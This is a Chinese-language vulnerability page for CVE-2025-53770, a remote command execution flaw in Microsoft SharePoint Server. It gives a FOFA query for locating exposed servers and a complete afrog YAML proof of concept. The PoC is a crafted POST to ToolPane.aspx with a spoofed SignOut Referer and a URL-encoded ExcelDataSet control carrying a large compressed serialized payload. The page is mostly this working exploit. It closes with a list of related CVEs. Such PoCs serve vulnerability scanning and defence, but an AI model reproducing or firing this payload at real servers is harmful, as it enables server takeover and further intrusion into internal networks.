CVE-2025-53770: Microsoft SharePointServer 远程命令执行漏洞

漏洞描述

Microsoft SharePointServer 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。 fofa: header="MicrosoftSharePointTeamServices" && (domain="xx.com" || domain="xxx.com")

PoC代码[已公开]

id: CVE-2025-53770

info:
  name: Microsoft SharePointServer 远程命令执行漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    Microsoft SharePointServer 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    fofa: header="MicrosoftSharePointTeamServices" && (domain="xx.com" || domain="xxx.com")
  reference:
    - https://cn-sec.com/archives/4351148.html
  tags: CVE,CVE2025,Microsoft,SharePointServer,rce
  created: 2025/08/11

rules:
  r0:
    request:
      method: POST
      path: /_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx
      headers:
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
      body: |
        MSOTlPn_Uri=https%3a//www.joloo.cn/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22gizpnozlcjfutvbn%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22sjqjboucouuj%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cgizpnozlcjfutvbn%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3csjqjboucouuj%3aExcelDataSet%20CompressedDataTable%3d%22H4sIAAAAAAAA%2F9R6aW%2FbSJp%2F5v%2FfHWBndl%2FtFzD8drpjHqLbCpIGRPG2WBKPqiJr0MCQLEY8ihQjUhe%2FzX6%2B%2FRC9oCTbSmKnk8xML9aGeFY99%2FPjU8erP7x69erXX3%2F9dTgPf%2F%2F%2B%2F169egW8Q9ul1Wsl6qIfrlC6bvNV%2FW70mhv%2Bf7iabli3Wafv6nTTrSP2w9ViE7M8uU8P%2FqpM63fxTz9FUiLd8mNxlHJ3438diP%2FnBc3jwUu7gde%2FBRXzkiytoj8HFVPy9%2B%2F1dVT94Q%2FDuz%2F%2B%2F1evXv3Xn97u2zftscnVvmJ1%2B%2B76%2BnTxZt%2B%2Bu866rnlzc7Pb7V7vxNer9fJG4Dj%2BJrBnJ7IPbauWRl307nqzrs%2FU2h%2BrPFmv2tX77sdkVb3ZV%2BzHU6vrq5y%2Bu25XVTrctWl3%2FfN%2F%2FOnqk79BrJSlVVp3V3VUpR93uDpRemO2Z2XfXXfrTfr4HLbpdLNep3U3WyURS8%2Bvn%2BHzwCtZVQ1L9%2F6hSV9o9dgyW%2BVJelXl9TxJNuv23TV3fVVF%2B4e7TR2vNjVN6UvsXlYxS7MXhfw%2BgT%2Ft1aYfNmmdfG2X58VsdvWjpQf7DzK8uz6H4HTFWJp0%2BapuX%2Btpna7z5PUsb7u%2F8X%2F962WUeul6mydp%2B9qsu3RdR%2By1um%2BiwW54HTVNuv6b8NgBp%2FFraL6erVptta6irkvXP1w9vfueLOLE99L7n97zPJW4SIx%2B%2BeGRV17T1a49CTmPizTphsvFerXN6cB3sU7btO6iQUVtHVXpbrUuv0MEkY%2Ffi3fSbUTF21EqSr%2F88qjTRwb6B2DEL79cX3VHJ%2B3bN1F9GBx2%2FXEE33xtEN18WxQd2399rB6bn6PtS3l485iIL%2BX0b%2FP9Aq%2BTlkcc%2B%2FmP%2F%2FLq1av%2Fvn9L8%2Ffvl%2Bs3p1NUfRfwnfqcSPxWnwdGP275ZwHyAg9fssGAJ1dnuQfM9aOYPYHkerWbr2m6PgLYuVUWtdMsqpdp%2B%2B46r9t03X0Zx942u%2Frxc5H%2F9vfix7xuu6hO0qePDP2Kr8xvRc0n0DF%2FfwkVnyfx7yDx1dfkxoPY6ikIvyYH3y7Wq0GdlC7WqyZddwfuazPXTrtsRUFUpT8raZuu84jlffr25uL5N1FaRAP6dem6%2FZavyRl%2Bfg8X7Nv8zQPs0Tdtt87r5fXPNzv1wBeTycSZTCaLm5ubmzt58vi3mw5HDwEpEV0We7slqtAhEdg2LjhuVkw29nS0m01lheI9RwOLLbDEaOAeQrxrTU3mw2rfhFzHUuRuIwFtFtgUgaDyYQ8F2y97oMPdXCm1I3%2FTkaHIeqqjblaCbazvWSi6TSxI%2FaykLK7QIcL2BgrjA9VRCQXEhYoWY%2F5BPsmnhtXEVdKaOt%2BHwvgQ6yyfTWVMAquP8Hiz8J2TzMWkNVXAx4bLJxUcxxXiqWFl8XS3hAbKY50VnoAkpI%2FXBI%2FGYZGIoY8K4If7uW9zxJ%2BM5oinJ2MhJRbRhk4yJRb4XRhYLFnSR54yZBzBfD%2BZ2BN5mYPJoz0lJRb2LcGAG9olB8kgWGJJxYqj%2FoGcJRXrY0F6oltN9pjv%2FDQAHMHcBoruIcJSPZvKXSKAbTLYO%2F9n%2BYnRwFkeY2KyHA6lcnGtDkd5Yk8mk%2Bn%2FcR2PqswC4VK%2BkWKyR51UgveMCBpHEBh0yWKd3YbBMVbNWNiXJDAteYhpWVWfbBTqp7wKjeH4IZ%2FcwQr1sYgOoYDU6GyjMLCkaZ11sS71C89aUcPdzfO7bSKAFcF8lhykLsLgEItgS2pnEwrjbibSJq7IaNabO1sJt6mudfF0vEsq1BMscSfZRvkD3Xm9HJtVxlFjcjs7jPtQyFiMtX5W8U0oWttEGFd0KhWxwG2pwDakXm7tYrID%2BXgUYr41l80oxvtN0jeDjEVsmF1caR0JwC7EgM0fbOV3WSICFmOrTX3%2Bwn%2FmfarzbVzbt0nB5aGwP8ywlMUY9YmuFcRvnvxfoSrWUUH1wde%2FTS%2Fyv0zPg3c%2FhQHoCebz2CjHcQCKWLTaCJtP9qnssVmBNsn5TYh5lohyFgrw9gmf2OIcvwcSgGOezwWtTwTUhdVeWjzGv3m%2FWK6W5nRyl%2FSNnNRWlnryaF52LPW5nOgaF3rmMlUaPcSAi0VL8jHiIn1cLjyrnw88asKS2tm4tbWNoZUlAhSABrikYhtyMP8yzScD%2FaWp7EfzUjsQEXWDz5N%2BdH98fv4tDPv2IZcW5ZJLOCY7UDv%2BXKgtbEQlW2EFYtaHWQ8CtxqvQIlcj9sHSJTnIdwjF44km9NGsZLNXcT8VOdFDLMPXk3nrsbu49LaAEw%2FYAXYsQIY9bMyUm3BVvcfoK8BJGpNKKDK412P6O7cEywjNQB0cYYponlsNCOnQB9inqxIVYogWIogoLqP0IcQ8w2BiRj2CZ%2FWzYZ43ei%2BX4ppgVrgdSL1ZdnD7BZwd5zDuSNPAzOnQHOqaGtQjbagzjR6GGfUID3BGgd1q8IBOcSGusaaHJJSArbhCJTP3JAbSa7RuLQC%2B6jiOOB1QqQDHHktDxnVbd1VIMysaDq%2Bdf1MsRVt6xtsD71xmPg2b3NoQQ1zPw%2B0KQ5o7Sskov1k54pEpnjvAo7wHkyEhCHFZRoflnsvKpjvidYMK8mBIkKSaStAjIK4dyGts10sdDwMtMLneC%2FkMsXVmZ8yc%2Bd63QiqkgA5yXVFaiSlVkV4nAGuK2y%2FHEV4X%2Fj1ahtyXeOrmhf38tY2ACZowsVqpro%2BjcKK2Y6IvKRAC0%2BV5LC845ygCWIhu8eVO%2FN41w2xw8eC5bqGrEeQ28Y9mUdCcwAQTCO14Yb4wVVGbENbABFwRHX4SEGbedCsHZHlQEG7iCeeV%2FKSX7v3bsBWsSar0A8ljwc%2BNexRUvIFEEYjUiPgF8T1de2W8LQAWBUBj3gfhyPb0G6BsBN9jTUYkYNdjSQba0GCbQnn497ukTqHfElLyQMC3dqGKhCocYne8veH8S0Vm5ooqI2wW1K9XduiO6UI4bBsFJ9DI6zyclogNfYzz1fQNK6BR3SiwWkHbKHbzERwTxlY33N7HhqlMFc76PGWHVZSCYXR9p5DI09ALFVpE1WqFHG7nV1nFa2p7ArkfohHiseaX1A94uWtjVaCp9Mw9C0Vam7tBmhm9%2BVo1mvYrhoyD9iOBqYQC1aEFKBRRV3HkI9CQROQbn1wK8bbFZra1W4Xq9bIK%2B96UkpW4lsfIObRjGN2UlgYY3iA%2FWTrQhD6PirnGllBaBkeypQ5AgYOAPbqRvYEuo4Khw%2FLro18c5QwWbZry%2FINqsHAApTLZkS1AlewOlBbLTZoB3QixGpnOaUWQaFBfo98W7CUpLL2ca%2BhqNegq%2B6t%2BDC%2B9yBYxSzTCHa7iCEvKambYKkhGLg%2B7sJIDdcxhoILaZYowPK5sRNCaeupu7WL1YOvanskaJj6wHNKeourbhPxrp0IpUBEa0aq%2FQwji3kKHPkVzyJh3CED7WdC5oUia4hAbVuUiQNDMcQdmPuZ5QayR3xURToYUdElHs4EN2ACQG7mVI50L4Y87MOeViQCsKtIOS6JLgm0Xo18DXj3IjIRXu1BQNi9oHlulY1Cls1hb3kULiXgIwINFAI4Dil0SVzDte8TGBXuCvHJOikzzvfJIlWljKj8LTSYaxey4RpQAlyziTVaErQ6OCKzEqHzgYgWoIDiTOgkO4Dbuc8YNsDBLwhMGW2IwIcO3nG2aH2g%2BmofMboGhSO4sNv6GpgmCrtNFVYijd76ombPuPIQG1ofHjotybuaBKhMdWkP%2BUaCArGpgdSw7ErA5NWMb%2Fa%2ByMqkR6s0yAIbohYzZiRcV6R1pns9GcVF5oaVtY4LMpsdxjo0bIlUfBFrrk18S5iJ4DYNkEWxW1NRA4QNmNnMkL7knCLkQrjcO4w2qZHsPYEggK3GE%2Bhm%2BKZCXq6igt0iQ7ZsA%2FKpkWnEG%2FshhmKEWYnKu72vMmkmSLLTZ27EkxypywOpM4ZUyYLTDs0xCKGvRUDvDJu3JF8z13ZBYCyqPfGTnnLjNYZLCfLUgHC8BnVmgKARIpEhu9RKgJk%2Fh2AdVu48xiOe%2BvI%2BKcsRKe2dq7Nd2E8kWFnIRiyCFWsjBiS3ssS01hSHkxZAZx9clEmhL29hlQVRZQuRxjLMshCqywPQ9yDBFkA6c20hFEM%2Ba13fwqBqVsinjutbOeQaGOfd2uYtc46XAuSWW3C4283hGLgCWENerme9qzsVmoJKEh04lh2ojhfTcT9n5%2FrhokZYTMfP1g%2FH9qV2SCpNeqhlIr8BBPPbpGbDmIuFmBtqmBkJyrFZsU1iIG6oNQjWOrO44GEsb53AqinmWVy7%2FZnew%2B8Oim5GdVY81cVweVEjn%2BkPbdR8Uey2z7S%2FqId221Rp5KSifIzRhhr26Z2y2z4j%2F%2FndvpiXNIoC%2BRm96O3F8%2FxC9rtn%2BVzUXqay96mucREGHgnAlgZWQTz56Rqe6sEISzsauE88fkvHJ%2FrF%2FJN61Mfjkvij3WI6fund1%2Fj%2BU3s82OkxJkxjeTuMlReelVMc5sO9W2kF1ceHFPKM6tmWKFz%2BVP9KSlKhjOrIimvAhVgqiPctdezyFhlsRzwZpoHM%2FGHc4R%2FpT9PAZWZ%2B97F9jvTYhir2YVHY%2FFxx7mbi8tbDEmf35lfFy6PsZ5st1HEeVaig6uAbzUmqsRBhlyX5U21PdX5n5vIirBoWiu6Trj6Xpzw4jslC3mKJMOaTCjBTv4wvfmzmMiCBu4oFdz6MQRae5RGslR%2Fl04tySA99nTCwhnEQRwLrO%2FPN4klu%2FmUxHX8ew%2F7nvnmwq32ypxXXTm8XX2jXwxF4oe1iOn6wnxoGbgYNa0srNoyvNw%2FjJKhrh8E%2BVEeHi7h9qd%2BDv%2B98wfpAMODcYQyG5EMskobo6HARz1ki8HYsaOWFH48xt%2FCsn1KlOV6bhnnrPI4n2XN%2BO9H42AYv8p%2BV55zR5Cw5jqldltTfjylhjSqzGN3Nnom5j%2BJB2W2%2FU6a7GfdCHD7orOxf8scTvtaulOio%2F7ac0foY7rchdp%2Bzu0GCk7%2BSy3Hyd%2BTN7AGDvmCjB1t%2BDTaQih2Scyx9k77GyUbvPXP5EP8P%2BOcKiEOV1lIM84%2F9%2BqLtv5hDn84dXOZ10j%2Bb1y%2FHwW%2Fg0T8oX4tnvivLh34elnqqa5tQgGOz7p7LnSoKrJ5qRxs%2FF09WXJNtJKChdshJYP4T7Ly89WvUxtO75%2FL9MC%2BtJq7cJq6oHutanfQj3vbNu5lo3jpDPaezDeFIG2L6KdY%2F1Clzivft7Nt5j%2BalxMf6bvu70P0nYdFiOr7AR7c5ry9kSV3%2BRZ7AyWQyyZ%2Fm%2BFwW66gOA5dBAR0irLVR0GTHecgy28a6y5KlPfQxXR21BNOM6tCIz762J7Q7xY%2Bzn%2Bxsxda%2Baf54%2FUQTaXHtHlJv%2FPyc6JBbx3i0rLgi2xdlzf%2FO%2FsvSHJSdOuVwsqbHOW3n%2BOzv1s1JBjIqHeo6J3ua43UIFwZWTQLHo7p2IAPGDW3g01yrUrtZUlF2zttjrk6rc4yoUhZjCMhn%2FFR5slTliWPvvsnfefekHxxqREuSl%2B1kMlHMizUPnWKpCBXrf3FtimsveJ9xyfn91sWWu8lkIs8u5tZbUyMsqUETC6MxOPHa2NPd0hFRSw10ID6%2FIQHikkprZ1PZoXjoB2YkYDAWOhYXfA56mgFs86BQJbt3ma0spekyBEPwYO04vhnGlWefkRPWCuNDdPgHrBf59j6swn6uQCHETg8Kl9k91JUhD6byY24hYcDhsZgcJBAG1poGkw3WtS7Whrp%2ByKNwcVwrQ3KW1IBN3eOikDp1Bjp%2Fb46e8uhYEzh7%2BTGP4DEPLEfYD7l1yhEEGiJI2dH2TuNHmG7C4Oj3w7Tkh34sYUNOQccV0IYEVhNyF%2BOy3ZA%2FqjyZ2KbyFPvHmgbznKXsjuuC4IQZo%2BGka8cb61HHB4w3tZMt7rXP8qWRs09x%2BYzvU3moJXriZZ%2BtFd47R3C6nzirI1Yd7Z2Fw8lwhHGXDFjilPbp%2BbEteKT%2FMDeyC8mRCHcaO5rqw3ogXH3W9rBbfv6s1PWBtPKk77mGWj7K8Izss4tY%2BkyfU6yYJ7kH3JH3H62ZP62nLm3Uxc%2FJ%2BXvkZIA467Q4vDqfy6Pxp%2B7xdD%2FdvXv39ua8%2FeGrd1t951aLt6dNL%2BZ548TFVojLnTHXP7%2B9%2BbjhV%2B3o%2BuYtKG9vvnGDzhe3fjW7%2BsVNX1maPb%2FV6%2BXdUm9vPtnZ9fOf%2FycAAP%2F%2Fhtm1wrkrAAA%3D%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/gizpnozlcjfutvbn%3aUpdateProgress%3e%0a
    expression: >-
      response.status == 200 && response.raw_header.bcontains(b'CVE-2025-53770')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2025/CVE-2025-53770.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞 （CVE-2025-4204） 无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434） 无POC

Hoverfly 远程命令执行(CVE-2025-54123) 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞（CVE-2025-4204）无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434）无POC